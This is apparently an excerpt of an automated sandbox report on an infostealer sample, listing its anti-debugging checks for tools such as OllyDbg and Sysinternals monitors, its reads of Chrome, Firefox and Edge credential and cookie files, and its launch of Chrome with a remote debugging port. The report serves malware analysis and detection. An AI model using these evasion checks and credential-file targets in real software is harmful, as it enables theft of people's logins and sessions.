Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_002D8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 9_2_002D116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_002D1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_002D11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 9_2_002D13C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6684D0 cpuid 9_2_6C6684D0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 9.2.service123.exe.6c5e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality

Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP